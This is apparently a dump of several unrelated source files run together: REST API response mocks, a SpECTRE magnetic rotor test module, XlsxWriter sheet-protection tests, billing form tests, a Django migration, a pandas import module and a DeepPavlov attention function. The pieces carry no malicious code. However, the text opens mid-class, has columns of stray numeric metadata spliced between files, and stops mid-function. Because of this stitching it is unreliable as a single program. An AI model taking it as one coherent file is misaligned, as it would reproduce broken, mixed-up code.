from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _index():
return 'some data'
return Response('Mock', LazyResult(_index))
class MockWithPost(object):
def post(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _post():
return 'some data'
return Response('Mock', LazyResult(_post))
class MockWithDelete(object):
def delete(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _delete():
return 'some data'
return Response('Mock', LazyResult(_delete))
class MockWithPut(object):
def put(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _put():
return 'some put data'
return Response('Mock', LazyResult(_put))
class ParamsMockWithPutAndStatus(object):
status_code = -1
def put(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _put():
return self.params
return Response('Mock', LazyResult(_put), status=self.status_code)
class MockWithDeleteAndStatus(object):
def delete(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _delete():
return 'some data'
return Response('Mock', LazyResult(_delete), status=403)
class MockWithIndexAndPost(object):
def index(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _index():
return 'some index data'
return Response('Mock', LazyResult(_index))
def post(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _post():
return 'some post data'
return Response('Mock', LazyResult(_post))
class ParamsMockWithIndex(object):
def index(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _index():
return self.params
return Response('Mock', LazyResult(_index))
class ParamsMockWithPost(object):
def post(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _index():
return self.params
return Response('Mock', LazyResult(_index))
class ParamsMockWithDelete(object):
def delete(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _delete():
return self.params
return Response('Mock', LazyResult(_delete))
class ParamsMockWithIndexAndStatus(object):
def index(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _index():
return self.params
return Response('Mock', LazyResult(_index), status=403)
class ParamsMockWithPostAndStatus(object):
def post(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _index():
return self.params
return Response('Mock', LazyResult(_index), status=403)
class DifferentMockWithIndex(object):
def index(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _index():
return 'some different data'
return Response('Mock', LazyResult(_index))
| 42.192
| 83
| 0.662495
| 543
| 5,274
| 6.127072
| 0.081031
| 0.135257
| 0.171326
| 0.207394
| 0.88428
| 0.872858
| 0.845807
| 0.798317
| 0.798317
| 0.798317
| 0
| 0.002632
| 0.279674
| 5,274
| 124
| 84
| 42.532258
| 0.873125
| 0
| 0
| 0.775701
| 0
| 0
| 0.031475
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.280374
| false
| 0.009346
| 0.280374
| 0.140187
| 0.981308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 11
|
98df0032cc98e3a41835e2b4355b81f21cd5e78d
| 2,647
|
py
|
Python
|
tests/Unit/PointwiseFunctions/AnalyticData/GrMhd/MagneticRotor.py
|
nilsvu/spectre
|
1455b9a8d7e92db8ad600c66f54795c29c3052ee
|
[
"MIT"
] | 117
|
2017-04-08T22:52:48.000Z
|
2022-03-25T07:23:36.000Z
|
tests/Unit/PointwiseFunctions/AnalyticData/GrMhd/MagneticRotor.py
|
GitHimanshuc/spectre
|
4de4033ba36547113293fe4dbdd77591485a4aee
|
[
"MIT"
] | 3,177
|
2017-04-07T21:10:18.000Z
|
2022-03-31T23:55:59.000Z
|
tests/Unit/PointwiseFunctions/AnalyticData/GrMhd/MagneticRotor.py
|
geoffrey4444/spectre
|
9350d61830b360e2d5b273fdd176dcc841dbefb0
|
[
"MIT"
] | 85
|
2017-04-07T19:36:13.000Z
|
2022-03-01T10:21:00.000Z
|
# Distributed under the MIT License.
# See LICENSE.txt for details.
import numpy as np
def compute_piecewise(x, rotor_radius, inner_value, outer_value):
radius = np.sqrt(np.square(x[0]) + np.square(x[1]))
if (radius > rotor_radius):
return outer_value
else:
return inner_value
def rest_mass_density(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return compute_piecewise(x, rotor_radius, inner_density, outer_density)
def spatial_velocity(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
omega = compute_piecewise(x, rotor_radius, angular_velocity, 0.0)
return np.array([-x[1] * omega, x[0] * omega, 0.0])
def specific_internal_energy(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index):
return (1.0 / (adiabatic_index - 1.0) * compute_pressure(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index) / rest_mass_density(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index))
def compute_pressure(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return pressure
def lorentz_factor(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
v = spatial_velocity(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index)
return 1. / np.sqrt(1. - np.dot(v, v))
def specific_enthalpy(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return (1.0 + adiabatic_index * specific_internal_energy(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index))
def magnetic_field(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return np.array(magnetic_field)
def divergence_cleaning_field(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index):
return 0.0
| 40.723077
| 79
| 0.687193
| 314
| 2,647
| 5.455414
| 0.165605
| 0.102744
| 0.105079
| 0.138938
| 0.799766
| 0.783421
| 0.754816
| 0.7338
| 0.7338
| 0.7338
| 0
| 0.008893
| 0.235361
| 2,647
| 64
| 80
| 41.359375
| 0.837451
| 0.023801
| 0
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.209302
| false
| 0
| 0.023256
| 0.139535
| 0.465116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
98e40e76354a084762617cf9de1c0a8ba973f332
| 8,854
|
py
|
Python
|
xlsxwriter/test/worksheet/test_write_sheet_protection.py
|
totdiao/XlsxWriter
|
3d65858d8933bddb8262d500bcc2005f28fde645
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
xlsxwriter/test/worksheet/test_write_sheet_protection.py
|
totdiao/XlsxWriter
|
3d65858d8933bddb8262d500bcc2005f28fde645
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
xlsxwriter/test/worksheet/test_write_sheet_protection.py
|
totdiao/XlsxWriter
|
3d65858d8933bddb8262d500bcc2005f28fde645
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2016, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...worksheet import Worksheet
class TestWriteSheetProtection(unittest.TestCase):
"""
Test the Worksheet _write_sheet_protection() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_sheet_protection_1(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_2(self):
"""Test the _write_sheet_protection() method."""
password = 'password'
options = {}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection password="83AF" sheet="1" objects="1" scenarios="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_3(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'select_locked_cells': 0}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" selectLockedCells="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_4(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'format_cells': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" formatCells="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_5(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'format_columns': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" formatColumns="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_6(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'format_rows': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" formatRows="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_7(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'insert_columns': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" insertColumns="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_8(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'insert_rows': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" insertRows="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_9(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'insert_hyperlinks': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" insertHyperlinks="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_10(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'delete_columns': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" deleteColumns="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_11(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'delete_rows': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" deleteRows="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_12(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'sort': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" sort="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_13(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'autofilter': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" autoFilter="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_14(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'pivot_tables': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" pivotTables="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_15(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'objects': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" scenarios="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_16(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'scenarios': 1}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_17(self):
"""Test the _write_sheet_protection() method."""
password = ''
options = {'format_cells': 1, 'select_locked_cells': 0, 'select_unlocked_cells': 0}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection sheet="1" objects="1" scenarios="1" formatCells="0" selectLockedCells="1" selectUnlockedCells="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_protection_18(self):
"""Test the _write_sheet_protection() method."""
password = 'drowssap'
options = {
'objects': 1,
'scenarios': 1,
'format_cells': 1,
'format_columns': 1,
'format_rows': 1,
'insert_columns': 1,
'insert_rows': 1,
'insert_hyperlinks': 1,
'delete_columns': 1,
'delete_rows': 1,
'select_locked_cells': 0,
'sort': 1,
'autofilter': 1,
'pivot_tables': 1,
'select_unlocked_cells': 0,
}
self.worksheet.protect(password, options)
self.worksheet._write_sheet_protection()
exp = """<sheetProtection password="996B" sheet="1" formatCells="0" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" insertHyperlinks="0" deleteColumns="0" deleteRows="0" selectLockedCells="1" sort="0" autoFilter="0" pivotTables="0" selectUnlockedCells="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
| 30.426117
| 286
| 0.611136
| 933
| 8,854
| 5.570204
| 0.096463
| 0.10583
| 0.211661
| 0.107754
| 0.833173
| 0.820858
| 0.820858
| 0.820858
| 0.803541
| 0.736386
| 0
| 0.022321
| 0.241021
| 8,854
| 290
| 287
| 30.531034
| 0.751042
| 0.102665
| 0
| 0.535714
| 0
| 0.011905
| 0.238943
| 0.023082
| 0
| 0
| 0
| 0
| 0.107143
| 1
| 0.113095
| false
| 0.22619
| 0.017857
| 0
| 0.136905
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
98ed29a70654be02e27dd878a2444e94eab8af89
| 44
|
py
|
Python
|
src/sage/crypto/__init__.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | 5
|
2015-01-04T07:15:06.000Z
|
2022-03-04T15:15:18.000Z
|
src/sage/crypto/__init__.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | null | null | null |
src/sage/crypto/__init__.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | 10
|
2016-09-28T13:12:40.000Z
|
2022-02-12T09:28:34.000Z
|
from lattice import gen_lattice
import all
| 11
| 31
| 0.840909
| 7
| 44
| 5.142857
| 0.714286
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 3
| 32
| 14.666667
| 0.972973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c70eb3191bf991f66333f7f071c60d73363ea369
| 4,782
|
py
|
Python
|
knownly/billing/tests/__init__.py
|
dwightgunning/knownly
|
55a3f82887dca1ff94723e3272ef79ed5f2d0eb2
|
[
"MIT"
] | 2
|
2017-11-21T20:24:01.000Z
|
2018-12-24T04:32:31.000Z
|
knownly/billing/tests/__init__.py
|
dwightgunning/knownly
|
55a3f82887dca1ff94723e3272ef79ed5f2d0eb2
|
[
"MIT"
] | 2
|
2020-06-05T18:05:19.000Z
|
2021-06-10T20:04:02.000Z
|
knownly/billing/tests/__init__.py
|
dwightgunning/knownly
|
55a3f82887dca1ff94723e3272ef79ed5f2d0eb2
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.test import TestCase
from knownly.billing.forms import SubscriptionPlanForm
from knownly.billing.models import CustomerBillingDetails
from knownly import plans
class SubscriptionPlanFormTest(TestCase):
def test_basic_plan_fields_required(self):
form = SubscriptionPlanForm(data={})
self.assertFalse(form.is_valid())
self.assertTrue(form.errors.pop('knownly_plan'))
self.assertFalse(form.errors)
def test_free_plan(self):
form_data = {'knownly_plan': plans.FREE}
form = SubscriptionPlanForm(data=form_data)
self.assertEqual(form.is_valid(), True)
def test_lite_fields_required(self):
form = SubscriptionPlanForm(data={'knownly_plan': plans.LITE})
form.is_valid()
print "ERRORS: %s" % form.errors
self.assertFalse(form.is_valid())
self.assertTrue(form.errors.pop('customer_type'))
self.assertTrue(form.errors.pop('period'))
self.assertTrue(form.errors.pop('currency'))
self.assertTrue(form.errors.pop('name'))
self.assertTrue(form.errors.pop('street_address'))
self.assertTrue(form.errors.pop('city'))
self.assertTrue(form.errors.pop('post_code'))
self.assertTrue(form.errors.pop('country'))
self.assertTrue(form.errors.pop('cc_bin'))
self.assertTrue(form.errors.pop('stripe_token'))
self.assertFalse(form.errors)
def test_lite_personal_fields_required(self):
form = SubscriptionPlanForm(data={'knownly_plan': plans.LITE,
'customer_type': CustomerBillingDetails.PERSONAL})
self.assertFalse(form.is_valid())
self.assertTrue(form.errors.pop('period'))
self.assertTrue(form.errors.pop('currency'))
self.assertTrue(form.errors.pop('name'))
self.assertTrue(form.errors.pop('street_address'))
self.assertTrue(form.errors.pop('city'))
self.assertTrue(form.errors.pop('post_code'))
self.assertTrue(form.errors.pop('country'))
self.assertTrue(form.errors.pop('cc_bin'))
self.assertTrue(form.errors.pop('stripe_token'))
self.assertFalse(form.errors)
def test_lite_business_non_eu_fields_required(self):
form = SubscriptionPlanForm(data={'knownly_plan': plans.LITE,
'customer_type': CustomerBillingDetails.BUSINESS})
self.assertFalse(form.is_valid())
self.assertTrue(form.errors.pop('period'))
self.assertTrue(form.errors.pop('currency'))
self.assertTrue(form.errors.pop('name'))
self.assertTrue(form.errors.pop('street_address'))
self.assertTrue(form.errors.pop('city'))
self.assertTrue(form.errors.pop('post_code'))
self.assertTrue(form.errors.pop('country'))
self.assertTrue(form.errors.pop('cc_bin'))
self.assertTrue(form.errors.pop('stripe_token'))
self.assertFalse(form.errors)
def test_lite_business_eu_fields_required(self):
form = SubscriptionPlanForm(data={'knownly_plan': plans.LITE,
'customer_type': CustomerBillingDetails.BUSINESS,
'country': 'NL'})
self.assertFalse(form.is_valid())
self.assertTrue(form.errors.pop('period'))
self.assertTrue(form.errors.pop('currency'))
self.assertTrue(form.errors.pop('name'))
self.assertTrue(form.errors.pop('street_address'))
self.assertTrue(form.errors.pop('city'))
self.assertTrue(form.errors.pop('post_code'))
self.assertTrue(form.errors.pop('cc_bin'))
self.assertTrue(form.errors.pop('stripe_token'))
self.assertTrue(form.errors.pop('vat_id'))
self.assertFalse(form.errors)
def test_lite_monthly_usd_personal(self):
form = SubscriptionPlanForm(data={'knownly_plan': plans.LITE,
'customer_type': CustomerBillingDetails.PERSONAL,
'period': 'monthly',
'currency': 'usd',
'stripe_token': 'abc',
'name': 'Dwight Gunning',
'street_address': 'van Tuyll van Serooskerkenweg 73i',
'city': 'Amsterdam',
'post_code': '1076JG',
'country': 'NL',
'cc_bin': '123456',
})
self.assertTrue(form.is_valid(), form.errors)
| 44.691589
| 96
| 0.595985
| 488
| 4,782
| 5.690574
| 0.14959
| 0.162045
| 0.252791
| 0.328412
| 0.770256
| 0.761973
| 0.733885
| 0.720922
| 0.720922
| 0.720922
| 0
| 0.003483
| 0.27959
| 4,782
| 106
| 97
| 45.113208
| 0.802612
| 0
| 0
| 0.556818
| 0
| 0
| 0.125471
| 0
| 0
| 0
| 0
| 0
| 0.568182
| 0
| null | null | 0
| 0.056818
| null | null | 0.011364
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c730433451854550af12eb17824a1a9c3e04ff6a
| 1,952
|
py
|
Python
|
netbox/extras/migrations/0054_standardize_models.py
|
orphanedgamboa/netbox
|
5cdc38ec3adb5278480b267a6c8e674e9d3fca39
|
[
"Apache-2.0"
] | 1
|
2022-02-18T03:00:08.000Z
|
2022-02-18T03:00:08.000Z
|
netbox/extras/migrations/0054_standardize_models.py
|
emersonfelipesp/netbox
|
fecca5ad83fb6b48a2f15982dfd3242653f105f9
|
[
"Apache-2.0"
] | 1
|
2021-08-23T15:38:47.000Z
|
2021-08-23T15:40:10.000Z
|
netbox/extras/migrations/0054_standardize_models.py
|
emersonfelipesp/netbox
|
fecca5ad83fb6b48a2f15982dfd3242653f105f9
|
[
"Apache-2.0"
] | 1
|
2018-12-05T12:03:21.000Z
|
2018-12-05T12:03:21.000Z
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('extras', '0053_rename_webhook_obj_type'),
]
operations = [
migrations.AlterField(
model_name='configcontext',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='customfield',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='customlink',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='exporttemplate',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='imageattachment',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='jobresult',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='objectchange',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='tag',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='taggeditem',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='webhook',
name='id',
field=models.BigAutoField(primary_key=True, serialize=False),
),
]
| 31.483871
| 73
| 0.567111
| 168
| 1,952
| 6.446429
| 0.214286
| 0.184672
| 0.23084
| 0.267775
| 0.767313
| 0.767313
| 0.767313
| 0.767313
| 0.767313
| 0.767313
| 0
| 0.003014
| 0.320184
| 1,952
| 61
| 74
| 32
| 0.813112
| 0
| 0
| 0.701754
| 0
| 0
| 0.080943
| 0.014344
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c75e0341918bb67d29fcb0b3e9155fd61be81aca
| 307
|
py
|
Python
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/pandas/core/reshape/api.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 18
|
2018-02-23T11:28:54.000Z
|
2021-09-23T08:19:54.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/pandas/core/reshape/api.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 2
|
2018-01-22T23:21:36.000Z
|
2018-01-22T23:31:27.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/pandas/core/reshape/api.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 12
|
2017-05-23T06:01:12.000Z
|
2021-08-16T05:09:46.000Z
|
# flake8: noqa
from pandas.core.reshape.concat import concat
from pandas.core.reshape.reshape import melt
from pandas.core.reshape.merge import (
merge, ordered_merge, merge_ordered, merge_asof)
from pandas.core.reshape.pivot import pivot_table, crosstab
from pandas.core.reshape.tile import cut, qcut
| 34.111111
| 59
| 0.811075
| 46
| 307
| 5.326087
| 0.391304
| 0.204082
| 0.285714
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003663
| 0.110749
| 307
| 8
| 60
| 38.375
| 0.893773
| 0.039088
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.833333
| 0
| 0.833333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c75f6f3282b689f54f4b41b511f4da94d9fb2c3b
| 17,014
|
py
|
Python
|
deeppavlov/core/layers/tf_attention_mechanisms.py
|
xbodx/DeepPavlov
|
4b60bf162df4294b8b0db3b72786cdd699c674fa
|
[
"Apache-2.0"
] | 5,893
|
2018-02-01T18:13:20.000Z
|
2022-03-31T19:22:21.000Z
|
deeppavlov/core/layers/tf_attention_mechanisms.py
|
xbodx/DeepPavlov
|
4b60bf162df4294b8b0db3b72786cdd699c674fa
|
[
"Apache-2.0"
] | 749
|
2018-01-31T11:36:02.000Z
|
2022-03-30T07:24:22.000Z
|
deeppavlov/core/layers/tf_attention_mechanisms.py
|
xbodx/DeepPavlov
|
4b60bf162df4294b8b0db3b72786cdd699c674fa
|
[
"Apache-2.0"
] | 1,155
|
2018-02-01T10:52:15.000Z
|
2022-03-29T02:12:15.000Z
|
# Copyright 2017 Neural Networks and Deep Learning lab, MIPT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from logging import getLogger
import tensorflow as tf
from tensorflow.contrib.layers import xavier_initializer as xav
from deeppavlov.core.layers import tf_csoftmax_attention as csoftmax_attention
log = getLogger(__name__)
def general_attention(key, context, hidden_size, projected_align=False):
""" It is a implementation of the Luong et al. attention mechanism with general score. Based on the paper:
https://arxiv.org/abs/1508.04025 "Effective Approaches to Attention-based Neural Machine Translation"
Args:
key: A tensorflow tensor with dimensionality [None, None, key_size]
context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
hidden_size: Number of units in hidden representation
projected_align: Using bidirectional lstm for hidden representation of context.
If true, beetween input and attention mechanism insert layer of bidirectional lstm with dimensionality [hidden_size].
If false, bidirectional lstm is not used.
Returns:
output: Tensor at the output with dimensionality [None, None, hidden_size]
"""
if hidden_size % 2 != 0:
raise ValueError("hidden size must be dividable by two")
batch_size = tf.shape(context)[0]
max_num_tokens, token_size = context.get_shape().as_list()[-2:]
r_context = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
# projected_key: [None, None, hidden_size]
projected_key = \
tf.layers.dense(key, hidden_size, kernel_initializer=xav())
r_projected_key = tf.reshape(projected_key, shape=[-1, hidden_size, 1])
lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
(output_fw, output_bw), states = \
tf.nn.bidirectional_dynamic_rnn(cell_fw=lstm_fw_cell,
cell_bw=lstm_bw_cell,
inputs=r_context,
dtype=tf.float32)
# bilstm_output: [-1, max_num_tokens, hidden_size]
bilstm_output = tf.concat([output_fw, output_bw], -1)
attn = tf.nn.softmax(tf.matmul(bilstm_output, r_projected_key), dim=1)
if projected_align:
log.info("Using projected attention alignment")
t_context = tf.transpose(bilstm_output, [0, 2, 1])
output = tf.reshape(tf.matmul(t_context, attn),
shape=[batch_size, -1, hidden_size])
else:
log.info("Using without projected attention alignment")
t_context = tf.transpose(r_context, [0, 2, 1])
output = tf.reshape(tf.matmul(t_context, attn),
shape=[batch_size, -1, token_size])
return output
def light_general_attention(key, context, hidden_size, projected_align=False):
